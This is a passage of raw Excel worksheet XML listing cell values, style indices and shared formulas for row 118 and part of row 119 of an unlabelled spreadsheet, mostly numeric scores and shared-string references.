      <c r="U118" s="95" t="s">
        <v>401</v>
      </c>
      <c r="V118" s="138" t="s">
        <v>2007</v>
      </c>
      <c r="W118" s="96" t="s">
        <v>2008</v>
      </c>
      <c r="X118" s="126" t="s">
        <v>2009</v>
      </c>
      <c r="Y118" s="126" t="s">
        <v>2010</v>
      </c>
      <c r="Z118" s="132" t="s">
        <v>2011</v>
      </c>
      <c r="AA118" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB118" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC118" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD118" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE118" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF118" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG118" s="98" t="s">
        <v>306</v>
      </c>
      <c r="AH118" s="99" t="s">
        <v>2012</v>
      </c>
      <c r="AI118" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ118" s="99" t="s">
        <v>225</v>
      </c>
      <c r="AK118" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AL118" s="100">
        <v>0.0</v>
      </c>
      <c r="AM118" s="100">
        <v>0.0</v>
      </c>
      <c r="AN118" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO118" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AP118" s="100">
        <v>0.0</v>
      </c>
      <c r="AQ118" s="100">
        <v>0.0</v>
      </c>
      <c r="AR118" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AS118" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT118" s="100" t="str">
        <f t="shared" si="164"/>
        <v>-</v>
      </c>
      <c r="AU118" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV118" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AW118" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX118" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY118" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ118" s="100">
        <v>0.0</v>
      </c>
      <c r="BA118" s="102">
        <v>2.0</v>
      </c>
      <c r="BB118" s="102">
        <v>0.0</v>
      </c>
      <c r="BC118" s="102">
        <v>0.0</v>
      </c>
      <c r="BD118" s="102">
        <v>0.0</v>
      </c>
      <c r="BE118" s="102">
        <v>0.0</v>
      </c>
      <c r="BF118" s="102">
        <v>0.0</v>
      </c>
      <c r="BG118" s="102">
        <v>0.0</v>
      </c>
      <c r="BH118" s="102">
        <v>0.0</v>
      </c>
      <c r="BI118" s="102">
        <v>0.0</v>
      </c>
      <c r="BJ118" s="102">
        <v>0.0</v>
      </c>
      <c r="BK118" s="102">
        <v>0.0</v>
      </c>
      <c r="BL118" s="103">
        <f t="shared" si="167"/>
        <v>0</v>
      </c>
      <c r="BM118" s="103">
        <f t="shared" si="168"/>
        <v>0</v>
      </c>
      <c r="BN118" s="103">
        <f t="shared" si="169"/>
        <v>0</v>
      </c>
      <c r="BO118" s="103">
        <f t="shared" si="170"/>
        <v>0</v>
      </c>
      <c r="BP118" s="103">
        <f t="shared" si="171"/>
        <v>0</v>
      </c>
      <c r="BQ118" s="103">
        <f t="shared" si="172"/>
        <v>0</v>
      </c>
      <c r="BR118" s="103">
        <f t="shared" si="173"/>
        <v>0</v>
      </c>
      <c r="BS118" s="103">
        <f t="shared" si="174"/>
        <v>0</v>
      </c>
      <c r="BT118" s="103">
        <f t="shared" si="175"/>
        <v>0</v>
      </c>
      <c r="BU118" s="103">
        <f t="shared" si="75"/>
        <v>0</v>
      </c>
      <c r="BV118" s="103">
        <f t="shared" si="76"/>
        <v>0</v>
      </c>
      <c r="BW118" s="104" t="s">
        <v>12</v>
      </c>
      <c r="BX118" s="104">
        <v>0.0</v>
      </c>
      <c r="BY118" s="104">
        <v>0.0</v>
      </c>
      <c r="BZ118" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA118" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CB118" s="104">
        <v>0.0</v>
      </c>
      <c r="CC118" s="104">
        <v>0.0</v>
      </c>
      <c r="CD118" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CE118" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF118" s="104" t="str">
        <f t="shared" si="203"/>
        <v>-</v>
      </c>
      <c r="CG118" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH118" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CI118" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CJ118" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK118" s="104">
        <v>0.0</v>
      </c>
      <c r="CL118" s="104">
        <v>0.0</v>
      </c>
      <c r="CM118" s="105">
        <v>2.0</v>
      </c>
      <c r="CN118" s="105">
        <v>0.0</v>
      </c>
      <c r="CO118" s="105">
        <v>0.0</v>
      </c>
      <c r="CP118" s="105">
        <v>0.0</v>
      </c>
      <c r="CQ118" s="105">
        <v>0.0</v>
      </c>
      <c r="CR118" s="105">
        <v>0.0</v>
      </c>
      <c r="CS118" s="105">
        <v>0.0</v>
      </c>
      <c r="CT118" s="105">
        <v>0.0</v>
      </c>
      <c r="CU118" s="105">
        <v>0.0</v>
      </c>
      <c r="CV118" s="105">
        <v>0.0</v>
      </c>
      <c r="CW118" s="105">
        <v>0.0</v>
      </c>
      <c r="CX118" s="105">
        <v>0.0</v>
      </c>
      <c r="CY118" s="105">
        <v>0.0</v>
      </c>
      <c r="CZ118" s="105">
        <v>0.0</v>
      </c>
      <c r="DA118" s="105">
        <v>0.0</v>
      </c>
      <c r="DB118" s="106">
        <f t="shared" si="176"/>
        <v>0</v>
      </c>
      <c r="DC118" s="106">
        <f t="shared" si="177"/>
        <v>0</v>
      </c>
      <c r="DD118" s="106">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="DE118" s="106">
        <f t="shared" si="179"/>
        <v>0</v>
      </c>
      <c r="DF118" s="106">
        <f t="shared" si="180"/>
        <v>0</v>
      </c>
      <c r="DG118" s="106">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH118" s="106">
        <f t="shared" si="181"/>
        <v>0</v>
      </c>
      <c r="DI118" s="106">
        <f t="shared" si="182"/>
        <v>0</v>
      </c>
      <c r="DJ118" s="106">
        <f t="shared" si="183"/>
        <v>0</v>
      </c>
      <c r="DK118" s="107">
        <f t="shared" si="104"/>
        <v>0</v>
      </c>
      <c r="DL118" s="106">
        <f t="shared" si="105"/>
        <v>0</v>
      </c>
      <c r="DM118" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DN118" s="108">
        <v>0.0</v>
      </c>
      <c r="DO118" s="108">
        <v>0.0</v>
      </c>
      <c r="DP118" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ118" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DR118" s="108">
        <v>0.0</v>
      </c>
      <c r="DS118" s="108">
        <v>0.0</v>
      </c>
      <c r="DT118" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DU118" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV118" s="108" t="str">
        <f t="shared" si="166"/>
        <v>-</v>
      </c>
      <c r="DW118" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX118" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DY118" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DZ118" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA118" s="108">
        <v>0.0</v>
      </c>
      <c r="EB118" s="108">
        <v>0.0</v>
      </c>
      <c r="EC118" s="109">
        <v>2.0</v>
      </c>
      <c r="ED118" s="109">
        <v>0.0</v>
      </c>
      <c r="EE118" s="109">
        <v>0.0</v>
      </c>
      <c r="EF118" s="109">
        <v>0.0</v>
      </c>
      <c r="EG118" s="109">
        <v>0.0</v>
      </c>
      <c r="EH118" s="109">
        <v>0.0</v>
      </c>
      <c r="EI118" s="109">
        <v>0.0</v>
      </c>
      <c r="EJ118" s="109">
        <v>0.0</v>
      </c>
      <c r="EK118" s="109">
        <v>0.0</v>
      </c>
      <c r="EL118" s="109">
        <v>0.0</v>
      </c>
      <c r="EM118" s="109">
        <v>0.0</v>
      </c>
      <c r="EN118" s="109">
        <v>0.0</v>
      </c>
      <c r="EO118" s="109">
        <v>0.0</v>
      </c>
      <c r="EP118" s="109">
        <v>0.0</v>
      </c>
      <c r="EQ118" s="109">
        <v>0.0</v>
      </c>
      <c r="ER118" s="110">
        <f t="shared" si="184"/>
        <v>0</v>
      </c>
      <c r="ES118" s="110">
        <f t="shared" si="185"/>
        <v>0</v>
      </c>
      <c r="ET118" s="110">
        <f t="shared" si="186"/>
        <v>0</v>
      </c>
      <c r="EU118" s="110">
        <f t="shared" si="187"/>
        <v>0</v>
      </c>
      <c r="EV118" s="110">
        <f t="shared" si="188"/>
        <v>0</v>
      </c>
      <c r="EW118" s="110">
        <f t="shared" si="189"/>
        <v>0</v>
      </c>
      <c r="EX118" s="110">
        <f t="shared" si="190"/>
        <v>0</v>
      </c>
      <c r="EY118" s="110">
        <f t="shared" si="191"/>
        <v>0</v>
      </c>
      <c r="EZ118" s="110">
        <f t="shared" si="192"/>
        <v>0</v>
      </c>
      <c r="FA118" s="110">
        <f t="shared" si="106"/>
        <v>0</v>
      </c>
      <c r="FB118" s="110">
        <f t="shared" si="107"/>
        <v>0</v>
      </c>
      <c r="FC118" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FD118" s="111">
        <v>2.0</v>
      </c>
      <c r="FE118" s="111">
        <v>4.0</v>
      </c>
      <c r="FF118" s="101" t="s">
        <v>229</v>
      </c>
      <c r="FG118" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FH118" s="111">
        <v>0.0</v>
      </c>
      <c r="FI118" s="111">
        <v>0.0</v>
      </c>
      <c r="FJ118" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FK118" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FL118" s="111" t="str">
        <f t="shared" si="155"/>
        <v>2002752, 2002749</v>
      </c>
      <c r="FM118" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FN118" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FO118" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FP118" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ118" s="111">
        <v>0.0</v>
      </c>
      <c r="FR118" s="111">
        <v>0.0</v>
      </c>
      <c r="FS118" s="112">
        <v>2.0</v>
      </c>
      <c r="FT118" s="112">
        <v>1.0</v>
      </c>
      <c r="FU118" s="112">
        <v>0.0</v>
      </c>
      <c r="FV118" s="112">
        <v>0.0</v>
      </c>
      <c r="FW118" s="112">
        <v>4.0</v>
      </c>
      <c r="FX118" s="112">
        <v>4.0</v>
      </c>
      <c r="FY118" s="112">
        <v>0.0</v>
      </c>
      <c r="FZ118" s="112">
        <v>0.0</v>
      </c>
      <c r="GA118" s="112">
        <v>0.0</v>
      </c>
      <c r="GB118" s="112">
        <v>0.0</v>
      </c>
      <c r="GC118" s="112">
        <v>0.0</v>
      </c>
      <c r="GD118" s="112">
        <v>0.0</v>
      </c>
      <c r="GE118" s="112">
        <v>0.0</v>
      </c>
      <c r="GF118" s="112">
        <v>0.0</v>
      </c>
      <c r="GG118" s="112">
        <v>0.0</v>
      </c>
      <c r="GH118" s="113">
        <f t="shared" si="193"/>
        <v>1</v>
      </c>
      <c r="GI118" s="113">
        <f t="shared" si="194"/>
        <v>0</v>
      </c>
      <c r="GJ118" s="113">
        <f t="shared" si="195"/>
        <v>0</v>
      </c>
      <c r="GK118" s="113">
        <f t="shared" si="196"/>
        <v>0</v>
      </c>
      <c r="GL118" s="113">
        <f t="shared" si="197"/>
        <v>0</v>
      </c>
      <c r="GM118" s="113">
        <f t="shared" si="198"/>
        <v>0</v>
      </c>
      <c r="GN118" s="113">
        <f t="shared" si="199"/>
        <v>4</v>
      </c>
      <c r="GO118" s="113">
        <f t="shared" si="200"/>
        <v>0</v>
      </c>
      <c r="GP118" s="113">
        <f t="shared" si="201"/>
        <v>0</v>
      </c>
      <c r="GQ118" s="114">
        <f t="shared" si="108"/>
        <v>0</v>
      </c>
      <c r="GR118" s="113">
        <f t="shared" si="109"/>
        <v>0</v>
      </c>
      <c r="GS118" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT118" s="94"/>
      <c r="GU118" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GV118" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GW118" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GX118" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY118" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ118" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA118" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB118" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC118" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD118" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HE118" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HF118" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG118" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH118" s="116">
        <v>47013.0</v>
      </c>
      <c r="HI118" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ118" s="93" t="s">
        <v>12</v>
      </c>
      <c r="HK118" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL118" s="93">
        <v>2.0</v>
      </c>
      <c r="HM118" s="93">
        <f t="shared" si="83"/>
        <v>1</v>
      </c>
      <c r="HN118" s="93">
        <v>0.0</v>
      </c>
      <c r="HO118" s="93">
        <v>1.0</v>
      </c>
      <c r="HP118" s="93">
        <v>1.0</v>
      </c>
      <c r="HQ118" s="118">
        <f t="shared" si="53"/>
        <v>1</v>
      </c>
      <c r="HR118" s="118">
        <f t="shared" si="54"/>
        <v>1</v>
      </c>
      <c r="HS118" s="118">
        <f t="shared" si="55"/>
        <v>1</v>
      </c>
      <c r="HT118" s="139" t="s">
        <v>12</v>
      </c>
      <c r="HU118" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV118" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HW118" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HX118" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HY118" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ118" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA118" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB118" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC118" s="120" t="str">
        <f t="shared" si="202"/>
        <v>-</v>
      </c>
      <c r="ID118" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IE118" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IF118" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IG118" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH118" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II118" s="99" t="s">
        <v>12</v>
      </c>
      <c r="IJ118" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK118" s="99">
        <v>1.0</v>
      </c>
      <c r="IL118" s="99">
        <v>0.0</v>
      </c>
      <c r="IM118" s="121">
        <f t="shared" si="159"/>
        <v>0</v>
      </c>
      <c r="IN118" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO118" s="98">
        <v>0.0</v>
      </c>
      <c r="IP118" s="123">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="IQ118" s="118">
        <f t="shared" si="59"/>
        <v>0</v>
      </c>
      <c r="IR118" s="118">
        <f t="shared" si="60"/>
        <v>0</v>
      </c>
      <c r="IS118" s="124" t="s">
        <v>13</v>
      </c>
      <c r="IT118" s="127"/>
      <c r="IU118" s="127"/>
      <c r="IV118" s="127"/>
      <c r="IW118" s="127"/>
      <c r="IX118" s="127"/>
      <c r="IY118" s="127"/>
      <c r="IZ118" s="127"/>
      <c r="JA118" s="127"/>
      <c r="JB118" s="127"/>
      <c r="JC118" s="127"/>
      <c r="JD118" s="127"/>
      <c r="JE118" s="127"/>
      <c r="JF118" s="127"/>
      <c r="JG118" s="127"/>
      <c r="JH118" s="127"/>
      <c r="JI118" s="127"/>
      <c r="JJ118" s="127"/>
      <c r="JK118" s="127"/>
      <c r="JL118" s="127"/>
      <c r="JM118" s="127"/>
      <c r="JN118" s="127"/>
      <c r="JO118" s="127"/>
      <c r="JP118" s="127"/>
      <c r="JQ118" s="127"/>
      <c r="JR118" s="127"/>
      <c r="JS118" s="127"/>
      <c r="JT118" s="127"/>
      <c r="JU118" s="127"/>
      <c r="JV118" s="127"/>
      <c r="JW118" s="127"/>
      <c r="JX118" s="127"/>
      <c r="JY118" s="127"/>
      <c r="JZ118" s="127"/>
      <c r="KA118" s="127"/>
      <c r="KB118" s="127"/>
      <c r="KC118" s="127"/>
      <c r="KD118" s="127"/>
      <c r="KE118" s="127"/>
      <c r="KF118" s="127"/>
      <c r="KG118" s="127"/>
      <c r="KH118" s="127"/>
      <c r="KI118" s="127"/>
      <c r="KJ118" s="127"/>
      <c r="KK118" s="127"/>
      <c r="KL118" s="127"/>
      <c r="KM118" s="127"/>
      <c r="KN118" s="127"/>
      <c r="KO118" s="127"/>
      <c r="KP118" s="127"/>
      <c r="KQ118" s="127"/>
      <c r="KR118" s="127"/>
      <c r="KS118" s="127"/>
      <c r="KT118" s="127"/>
      <c r="KU118" s="127"/>
      <c r="KV118" s="127"/>
      <c r="KW118" s="127"/>
      <c r="KX118" s="127"/>
      <c r="KY118" s="127"/>
      <c r="KZ118" s="127"/>
      <c r="LA118" s="127"/>
      <c r="LB118" s="127"/>
      <c r="LC118" s="127"/>
      <c r="LD118" s="127"/>
      <c r="LE118" s="127"/>
      <c r="LF118" s="127"/>
      <c r="LG118" s="127"/>
      <c r="LH118" s="127"/>
      <c r="LI118" s="127"/>
      <c r="LJ118" s="127"/>
      <c r="LK118" s="127"/>
      <c r="LL118" s="127"/>
      <c r="LM118" s="127"/>
      <c r="LN118" s="127"/>
      <c r="LO118" s="127"/>
      <c r="LP118" s="127"/>
      <c r="LQ118" s="127"/>
      <c r="LR118" s="127"/>
      <c r="LS118" s="127"/>
      <c r="LT118" s="127"/>
      <c r="LU118" s="127"/>
      <c r="LV118" s="127"/>
      <c r="LW118" s="127"/>
      <c r="LX118" s="127"/>
      <c r="LY118" s="127"/>
      <c r="LZ118" s="127"/>
      <c r="MA118" s="127"/>
      <c r="MB118" s="127"/>
      <c r="MC118" s="127"/>
      <c r="MD118" s="127"/>
      <c r="ME118" s="127"/>
      <c r="MF118" s="127"/>
      <c r="MG118" s="127"/>
      <c r="MH118" s="127"/>
      <c r="MI118" s="127"/>
      <c r="MJ118" s="127"/>
      <c r="MK118" s="127"/>
      <c r="ML118" s="127"/>
      <c r="MM118" s="127"/>
      <c r="MN118" s="127"/>
      <c r="MO118" s="127"/>
      <c r="MP118" s="127"/>
      <c r="MQ118" s="127"/>
      <c r="MR118" s="127"/>
      <c r="MS118" s="127"/>
      <c r="MT118" s="127"/>
      <c r="MU118" s="127"/>
      <c r="MV118" s="127"/>
      <c r="MW118" s="127"/>
      <c r="MX118" s="127"/>
      <c r="MY118" s="127"/>
      <c r="MZ118" s="127"/>
      <c r="NA118" s="127"/>
      <c r="NB118" s="127"/>
      <c r="NC118" s="127"/>
      <c r="ND118" s="127"/>
      <c r="NE118" s="127"/>
      <c r="NF118" s="127"/>
      <c r="NG118" s="127"/>
      <c r="NH118" s="127"/>
      <c r="NI118" s="127"/>
      <c r="NJ118" s="127"/>
      <c r="NK118" s="127"/>
      <c r="NL118" s="127"/>
      <c r="NM118" s="127"/>
      <c r="NN118" s="127"/>
      <c r="NO118" s="127"/>
      <c r="NP118" s="127"/>
      <c r="NQ118" s="127"/>
      <c r="NR118" s="127"/>
      <c r="NS118" s="127"/>
      <c r="NT118" s="127"/>
      <c r="NU118" s="127"/>
      <c r="NV118" s="127"/>
      <c r="NW118" s="127"/>
      <c r="NX118" s="127"/>
      <c r="NY118" s="127"/>
    </row>
    <row r="119" ht="153.75" customHeight="1">
      <c r="B119" s="89" t="s">
        <v>2013</v>
      </c>
      <c r="C119" s="90" t="s">
        <v>12</v>
      </c>
      <c r="D119" s="91" t="s">
        <v>2014</v>
      </c>
      <c r="E119" s="90" t="s">
        <v>2015</v>
      </c>
      <c r="F119" s="90" t="s">
        <v>2016</v>
      </c>
      <c r="G119" s="90" t="s">
        <v>2017</v>
      </c>
      <c r="H119" s="151" t="s">
        <v>2018</v>
      </c>
      <c r="I119" s="92" t="s">
        <v>2019</v>
      </c>
      <c r="J119" s="92" t="s">
        <v>1773</v>
      </c>
      <c r="K119" s="92" t="s">
        <v>2020</v>
      </c>
      <c r="L119" s="93" t="s">
        <v>679</v>
      </c>
      <c r="M119" s="93">
        <v>8.0</v>
      </c>
      <c r="N119" s="93">
        <v>1.0</v>
      </c>
      <c r="O119" s="93">
        <v>0.0</v>
      </c>
      <c r="P119" s="93">
        <v>1.0</v>
      </c>
      <c r="Q119" s="93">
        <f t="shared" si="160"/>
        <v>1</v>
      </c>
      <c r="R119" s="93">
        <v>1.0</v>
      </c>
      <c r="S119" s="93">
        <v>0.0</v>
      </c>
      <c r="T119" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U119" s="95" t="s">
        <v>219</v>
      </c>
      <c r="V119" s="96" t="s">
        <v>2021</v>
      </c>
      <c r="W119" s="96" t="s">
        <v>12</v>
      </c>
      <c r="X119" s="97" t="s">
        <v>2022</v>
      </c>
      <c r="Y119" s="96" t="s">
        <v>2023</v>
      </c>
      <c r="Z119" s="126" t="s">
        <v>2024</v>
      </c>
      <c r="AA119" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB119" s="95" t="s">
        <v>858</v>
      </c>
      <c r="AC119" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD119" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE119" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF119" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG119" s="98" t="s">
        <v>226</v>
      </c>
      <c r="AH119" s="99" t="s">
        <v>2025</v>
      </c>
      <c r="AI119" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ119" s="99" t="s">
        <v>225</v>
      </c>
      <c r="AK119" s="100" t="s">
        <v>2026</v>
      </c>
      <c r="AL119" s="100">
        <v>2.0</v>
      </c>
      <c r="AM119" s="100">
        <v>4.0</v>
      </c>
      <c r="AN119" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO119" s="100" t="s">
        <v>2026</v>
      </c>
      <c r="AP119" s="100">
        <v>2.0</v>
      </c>
      <c r="AQ119" s="100">
        <v>4.0</v>
      </c>
      <c r="AR119" s="100" t="s">
        <v>2026</v>
      </c>
      <c r="AS119" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT119" s="100" t="str">
        <f t="shared" si="164"/>
        <v>29456, 384</v>
      </c>
      <c r="AU119" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV119" s="100" t="s">
        <v>2026</v>
      </c>
      <c r="AW119" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX119" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY119" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ119" s="100">
        <v>0.0</v>
      </c>
      <c r="BA119" s="102">
        <v>7.0</v>
      </c>
      <c r="BB119" s="102">
        <v>0.0</v>
      </c>
      <c r="BC119" s="102">
        <v>1.0</v>
      </c>
      <c r="BD119" s="102">
        <v>4.0</v>
      </c>
      <c r="BE119" s="102">
        <v>0.0</v>
      </c>
      <c r="BF119" s="102">
        <v>0.0</v>
      </c>
      <c r="BG119" s="102">
        <v>0.0</v>
      </c>
      <c r="BH119" s="102">
        <v>0.0</v>
      </c>
      <c r="BI119" s="102">
        <v>0.0</v>
      </c>
      <c r="BJ119" s="102">
        <v>1.0</v>
      </c>
      <c r="BK119" s="102">
        <v>4.0</v>
      </c>
      <c r="BL119" s="103">
        <f t="shared" si="167"/>
        <v>0</v>
      </c>
      <c r="BM119" s="103">
        <f t="shared" si="168"/>
        <v>0</v>
      </c>
      <c r="BN119" s="103">
        <f t="shared" si="169"/>
        <v>0</v>
      </c>
      <c r="BO119" s="103">
        <f t="shared" si="170"/>
        <v>1</v>
      </c>
      <c r="BP119" s="103">
        <f t="shared" si="171"/>
        <v>1</v>
      </c>
      <c r="BQ119" s="103">
        <f t="shared" si="172"/>
        <v>0</v>
      </c>
      <c r="BR119" s="103">
        <f t="shared" si="173"/>
        <v>4</v>
      </c>
      <c r="BS119" s="103">
        <f t="shared" si="174"/>
        <v>4</v>
      </c>
      <c r="BT119" s="103">
        <f t="shared" si="175"/>
        <v>0</v>
      </c>
      <c r="BU119" s="103">
        <f t="shared" si="75"/>
        <v>0</v>
      </c>
      <c r="BV119" s="103">
        <f t="shared" si="76"/>
        <v>0</v>
      </c>
      <c r="BW119" s="104" t="s">
        <v>2026</v>
      </c>
      <c r="BX119" s="104">
        <v>2.0</v>
      </c>
      <c r="BY119" s="104">
        <v>4.0</v>
      </c>
      <c r="BZ119" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA119" s="104" t="s">
        <v>2026</v>
      </c>
      <c r="CB119" s="104">
        <v>2.0</v>
      </c>
      <c r="CC119" s="104">
        <v>4.0</v>
      </c>
      <c r="CD119" s="104" t="s">
        <v>2026</v>
      </c>
      <c r="CE119" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF119" s="104" t="str">
        <f t="shared" si="203"/>
        <v>29456, 384</v>
      </c>
      <c r="CG119" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH119" s="104" t="s">
        <v>2026</v>
      </c>
      <c r="CI119" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CJ119" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK119" s="104">
        <v>0.0</v>
      </c>
      <c r="CL119" s="104">
        <v>0.0</v>
      </c>
      <c r="CM119" s="105">
        <v>5.0</v>
      </c>
      <c r="CN119" s="105">
        <v>0.0</v>
      </c>
      <c r="CO119" s="105">
        <v>1.0</v>
      </c>
      <c r="CP119" s="105">
        <v>4.0</v>
      </c>
      <c r="CQ119" s="105">
        <v>0.0</v>
      </c>
      <c r="CR119" s="105">
        <v>4.0</v>
      </c>
      <c r="CS119" s="105">
        <v>0.0</v>
      </c>
      <c r="CT119" s="105">
        <v>0.0</v>
      </c>
      <c r="CU119" s="105">
        <v>0.0</v>
      </c>
      <c r="CV119" s="105">
        <v>0.0</v>
      </c>
      <c r="CW119" s="105">
        <v>0.0</v>
      </c>
      <c r="CX119" s="105">
        <v>1.0</v>
      </c>
      <c r="CY119" s="105">
        <v>4.0</v>
      </c>
      <c r="CZ119" s="105">
        <v>0.0</v>
      </c>
      <c r="DA119" s="105">
        <v>4.0</v>
      </c>
      <c r="DB119" s="106">
        <f t="shared" si="176"/>
        <v>0</v>
      </c>
      <c r="DC119" s="106">
        <f t="shared" si="177"/>
        <v>0</v>
      </c>
      <c r="DD119" s="106">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="DE119" s="106">
        <f t="shared" si="179"/>
        <v>1</v>
      </c>
      <c r="DF119" s="106">
        <f t="shared" si="180"/>
        <v>1</v>
      </c>
      <c r="DG119" s="106">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH119" s="106">
        <f t="shared" si="181"/>
        <v>4</v>
      </c>
      <c r="DI119" s="106">
        <f t="shared" si="182"/>
        <v>4</v>
      </c>
      <c r="DJ119" s="106">
        <f t="shared" si="183"/>
        <v>0</v>
      </c>
      <c r="DK119" s="107">
        <f t="shared" si="104"/>
        <v>0</v>
      </c>
      <c r="DL119" s="106">
        <f t="shared" si="105"/>
        <v>0</v>
      </c>
      <c r="DM119" s="108" t="s">
        <v>2027</v>
      </c>
      <c r="DN119" s="108">
        <v>3.0</v>
      </c>
      <c r="DO119" s="108">
        <v>5.0</v>
      </c>
      <c r="DP119" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ119" s="108" t="s">
        <v>2027</v>
      </c>
      <c r="DR119" s="108">
        <v>3.0</v>
      </c>
      <c r="DS119" s="108">
        <v>5.0</v>
      </c>
      <c r="DT119" s="108" t="s">
        <v>2027</v>
      </c>
      <c r="DU119" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV119" s="108" t="str">
        <f t="shared" si="166"/>
        <v>29456, 384, 13249</v>
      </c>
      <c r="DW119" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX119" s="108" t="s">
        <v>2027</v>
      </c>
      <c r="DY119" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DZ119" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA119" s="108">
        <v>0.0</v>
      </c>
      <c r="EB119" s="108">
        <v>0.0</v>
      </c>
      <c r="EC119" s="109">
        <v>7.0</v>
      </c>
      <c r="ED119" s="109">
        <v>1.0</v>
      </c>
      <c r="EE119" s="109">
        <v>1.0</v>
      </c>
      <c r="EF119" s="109">
        <v>5.0</v>
      </c>
      <c r="EG119" s="109">
        <v>0.0</v>
      </c>
      <c r="EH119" s="109">
        <v>5.0</v>
      </c>
      <c r="EI119" s="109">
        <v>0.0</v>
      </c>
      <c r="EJ119" s="109">
        <v>0.0</v>
      </c>
      <c r="EK119" s="109">
        <v>0.0</v>
      </c>
      <c r="EL119" s="109">
        <v>0.0</v>
      </c>
      <c r="EM119" s="109">
        <v>1.0</v>
      </c>
      <c r="EN119" s="109">
        <v>1.0</v>
      </c>
